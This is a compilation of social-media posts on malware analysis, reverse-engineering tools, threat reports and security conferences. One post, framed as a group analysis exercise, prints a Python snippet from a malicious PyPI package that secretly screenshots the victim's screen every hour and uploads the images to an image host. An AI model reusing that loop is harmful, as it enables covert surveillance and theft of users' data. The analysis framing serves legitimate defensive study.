The dangers of cheap IOT smart devices and malware. Takeaway: be highly suspicious of even something so innocent seeming as a photo frame.
https://gist.github.com/iansinclair/c32aeafdc84e641c537a0a6c549f30b9
With our team at Stratosphere Laboratory AIC FEE CTU, we are organising this year's Honeynet Project Workshop 2025 in Prague!
It will be a unique space to share your passion for deception technologies, honeypots, and cybersecurity with industry leaders and fellow researchers!
We are looking for sponsors who want to support deception research! Early birds are still open until April 29th! Grab your tickets! Last days to submit your training and talks proposals! Students can apply for a Cédric Blancher Memorial Scholarship!
This is the first time the conference is coming to Prague, with previous editions hosted in Copenhagen (2024), Innsbruck (2019), Taipei (2018), Canberra (2017), San Antonio (2016), Stavanger (2015), Warsaw (2014), Dubai (2013), San Francisco (2012), Paris (2011), Mexico City (2010) and Kuala Lumpur (2009).
What a unique opportunity!
https://prague2025.honeynet.org/
Boost and help us spread the word! 
ResolverRAT: A New Stealthy Threat in Healthcare Cybersecurity
The emergence of ResolverRAT highlights a significant evolution in malware tactics, especially targeting the healthcare and pharmaceutical sectors. By leveraging sophisticated techniques to evade dete...
https://news.lavx.hu/article/resolverrat-a-new-stealthy-threat-in-healthcare-cybersecurity
The Relentless Tactics of Gamaredon: A Deep Dive into Ukraine's Cybersecurity Nightmare
In the shadow of more notorious Russian hacking groups, Gamaredon emerges as a relentless force in cyber espionage, leveraging simplicity and persistence to execute thousands of attacks against Ukrain...
New Open-Source Tool Spotlight 
Want a Windows VM tailored for malware analysis and reverse engineering? FLARE-VM automates setup with Chocolatey and Boxstarter, offering a curated toolbox. Just meet the requirements: Win10+, PowerShell5+, 60GB+ disk. Ideal for secure sandboxing. #ReverseEngineering #MalwareAnalysis
Project link on #GitHub 
https://github.com/fireeye/flare-vm
#Infosec #Cybersecurity #Software #Technology #News #CTF #Cybersecuritycareer #hacking #redteam #blueteam #purpleteam #tips #opensource #cloudsecurity
— 
P.S. Found this helpful? Tap Follow for more cybersecurity tips and insights! I share weekly content for professionals and people who want to get into cyber. Happy hacking 
In the course of its investigations, @volexity frequently encounters malware samples written in Golang. This reflects the increase in popularity of the Golang generally, and presents challenges to reverse engineering tools.
Today, @volexity is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. @r00tbsd & Killian Raimbaud presented details at INCYBER Forum earlier today.
GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!
Check out the blog post on how GoResolver works and where to download it: https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/
#dfir #reversing #malwareanalysis
(cyfirma.com) Konni RAT Analysis: Multi-Stage Attack Process and Evasion Techniques https://www.cyfirma.com/research/analysis-of-konni-rat-stealth-persistence-and-anti-analysis-techniques/
Executive Summary:
This report provides a comprehensive analysis of Konni RAT, a sophisticated remote access Trojan linked to North Korean cyber espionage group APT37. The malware employs a multi-stage attack process involving batch files, PowerShell scripts, and VBScript to exfiltrate sensitive data and maintain persistence. The attack begins with a zip archive containing a malicious LNK file disguised as a document. The malware exploits Windows Explorer limitations to hide malicious commands and uses obfuscation techniques to evade detection. Key capabilities include data exfiltration from user directories, system information gathering, persistence through registry modifications, and communication with command-and-control servers. The report includes detailed technical analysis of the attack stages, from initial infection to data exfiltration, along with indicators of compromise and YARA detection rules.
For hobbyist Cobalt Strike Beacon collectors, note that the recently announced 4.11 update introduces a number of changes to frustrate Beacon configuration extraction, namely through the new `transform-obfuscate` field.
When set, this field can apply multiple layers of encoding, encryption and compression (with some recent Beacons observed with a 32 byte XOR key, configurable upto 2048 bytes!).
While still reasonably trivial to decode manually, standard automated workflows (say, through the SentinelOne parser) will now fail, not least because of changes to the well-known field markers.
Beacons with these characteristics have thus far been observed with watermarks indicative of licensed instances, though I imagine it is only a matter of time before the 4.11 capabilities become accessible to all manner of miscreants.
A sample configuration, via a staged Beacon on 104.42.26[.]200 is attached, including the three distinct XOR keys used to decode it.
https://www.cobaltstrike.com/blog/cobalt-strike-411-shh-beacon-is-sleeping
DollyWay Malware Campaign Breaches 20,000 WordPress Sites: A Deep Dive into Cybersecurity Threats
The DollyWay malware campaign has compromised over 20,000 WordPress sites, evolving into a sophisticated redirection system that poses significant risks to both users and site administrators. As cyber...
Lets analyze malware together!
def periodic_screenshots():
os.makedirs(screenshot_folder, exist_ok=True)
while True:
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
screenshot_path = os.path.join(
screenshot_folder, f"{hostname}_{timestamp}.png")
try:
screenshot = ImageGrab.grab ()
screenshot.save(screenshot_path)
upload_image_to_imgbb(screenshot_path)
os.remove(screenshot_path)
except Exception as e:
pass
time.sleep (3600)
This code snippet is from a malicious python package called Zebo-0.1.0 that was found on the PyPI platform.
Questions:
Put on your analyst hats and share your insights below! 
Let’s learn and sharpen our skills together.
The tenth article (35 pages) of the Malware Analysis Series (MAS) is available on:
https://exploitreversing.com/2025/01/15/malware-analysis-series-mas-article-10/
I would like to thank Ilfak Guilfanov @ilfak and @HexRaysSA (on X) for their constant and uninterrupted support, which have helped me write these articles.
I promised to write a series of ten articles, and this is the last one. I hope that over the years I have provided professionals around the world with a little help in improving their malware analysis and reverse engineering skills. The series is now complete and this was my last contribution on malware analysis.
Next week (JAN/22) the third article of the Exploiting Reversing Series (ER 03), which is my long-term series, will be released. I hope you like it.
Have an excellent day.
The nineth article (38 pages) of the Malware Analysis Series (MAS) is available on:
https://exploitreversing.com/2025/01/08/malware-analysis-series-mas-article-09/
I would like to thank Ilfak Guilfanov @ilfak and @HexRaysSA (on X) for their constant and uninterrupted support, which have helped me write these articles.
Even though I haven't been on this subject for years, I promised I would write a series of ten articles, and the last one will be released next week (JAN/15).
Have a great day.
GenAI x Sec Advent #18
I’ve built a PCAP analyzer with GenAI—let me explain! 
PCAP analysis can be quite tricky, especially if you’re not familiar with the protocols or aren’t sure what to search for. To simplify this, I created a tool that processes PCAP data and passes it into an Embedding.
Yes, I used a RAG. 
But I used something else too! 
I wanted to introduce you to another concept—HYDE or Hypothetical Document Embeddings.
HYDE improves RAG when queries are complex, data are noisy, or patterns are subtle—just like... a PCAP!
HYDE will generate hypothetical insights based on the user’s query (e.g., “What anomalies exist in this traffic?”). Using Hypothetical Document Embeddings, the tool expands your query into a contextual document that captures the intent, to retrieve more relevant packets and patterns! 
Think of this way: you are in a library searching for "AI in cybersecurity". Instead of an exact title, you describe what you need (a hypothetical document). The librarian finds books matching your description, even if the keywords don’t align. You get the idea? 
That’s exactly what HYDE does for your queries. It expands the context and meaning, to make your retrieval smarter and more precise.
Have a look to the output below there is a HUGE difference between the RAG with HYDE and the one without! 
Follow along—I’ll share the code tomorrow as I want to explain something else! 
HYDE Paper: https://arxiv.org/pdf/2212.10496
GenAI x Sec Advent #14
Mandiant has just released XRefer, an open-source IDA Pro plugin that clusters binary functions and leverages Gemini and other models for the analysis.
The tool can generate a ‘map’ of a binary, to assist analysts to understand the structure of the binary. 
In the demo below, you can see how the tool clusters parts of the binary and adds additional details by malware functionalities such as command execution, C2 communication, or encryption.
I haven’t tried it yet, but it looks promising! 
just pushed a new release of The Yaralyzer, my unexpectedly popular tool for visually inspecting the output of #YARA scans with a lot of colors. example output below. change is small: it can now use a directory full of YARA rules files without renaming them all to end in .yara.
https://github.com/michelcrypt4d4mus/yaralyzer
someone has packaged this tool for Kali Linux though I don't know if it's in the distro yet. also available for macOS homebrew via an installer someone made for The Pdfalyzer.
Thomas Roccia at #Microsoft was also kind enough to make The Yaralyzer available via a web interface: https://x.com/fr0gger_/status/1749690000478974283
I'm in a weird position professionally and guess I am looking for a #mentor ? Maybe just someone more experienced than me to talk to and not necessarily some long term commitment of expectations? Growth just isn't going to happen where I'm at and I think I keep getting stuck in an under-/overqualified limbo.
Mainly work in #malwareanalysis #threatintel #detectionengineering with heavy #programming skills.
Always see #CyberMentorMondays does it do anything?
A funny phishing targeting GitHub users with an email notification about a security issue on a existing repository.
Then the captcha verification on a malicious website is trying to trick the user to run a shell command on Windows.
Powershell to be executed by the user
https://gist.github.com/adulau/6cf6f3e9c5bbd9106af8814d0a22f473
File downloaded https://pandora.circl.lu/analysis/21e8f693-361b-4a04-853c-276f9dd841e4/seed-1XqUr4mADaFYlLAyrBH8oQUBgOoEbceZ586b8h05YyA - Lumma Stealer
Malicious domain analysis. https://lookyloo.circl.lu/tree/91106035-dfec-4acc-af06-c9fc36c62774
So far, I have written 706 pages to help the security community. My goal will be writing new articles of the Exploiting Reversing Series (ERS), which is focused on security research. However, I am planning to write one or two additional articles of my previous series MAS (Malware Analysis Series) to finish it off.
10. https://exploitreversing.com/2024/01/03/exploiting-reversing-er-series-article-02/
09. https://exploitreversing.com/2023/04/11/exploiting-reversing-er-series/
08. https://exploitreversing.com/2024/08/07/malware-analysis-series-mas-article-08/
07. https://exploitreversing.com/2023/01/05/malware-analysis-series-mas-article-7/
06. https://exploitreversing.com/2022/11/24/malware-analysis-series-mas-article-6/
05. https://exploitreversing.com/2022/09/14/malware-analysis-series-mas-article-5/
04. https://exploitreversing.com/2022/05/12/malware-analysis-series-mas-article-4/
03. https://exploitreversing.com/2022/05/05/malware-analysis-series-mas-article-3/
02. https://exploitreversing.com/2022/02/03/malware-analysis-series-mas-article-2/
01. https://exploitreversing.com/2021/12/03/malware-analysis-series-mas-article-1/
I accidentally removed this; 1 sec
Hello! I just joined, a friend mentioned this nice social and I just joined. Happy to be here! a small intro: I am 24 years old, I am always into reverse engineering. More specifically - malware reversing. Including Rootkits, EQGRP stuff, and such. Nice to meet everyone!
If needed, my github is this:
https://github.com/loneicewolf
(I always include it in intro's)
Wishes and Saluting Sweden!
DMS/PMS open; if needed ^_^ 
Hello! I will be hosting a workshop on Reversing Rust Binaries this upcoming Friday, at @NorthSec in Montréal!
https://nsec.io/session/2024-reversing-rust-binaries-one-step-beyond-strings.html
This workshop focuses on some practical skills for reversing Rust binaries, and using strings in Rust binaries as an entry point to exploring reversing them!
The workshop will be on Friday, May 17th, from 9am-12pm EDT (UTC -4). The conference and workshops will be streamed; here's the link for the Workshop 1, Day 2 stream, which is my timeslot: https://www.youtube.com/live/VH7ID5S7_pI
Edit: A repository with pre-workshop setup instructions, and the sample code for the workshop, is now available here: https://github.com/cxiao/rust-reversing-workshop-northsec-2024/
Edit 2: That repository now has a link to a preconfigured Ubuntu VM image with all necessary tools and files for the workshop, to make setup for the workshop easier!
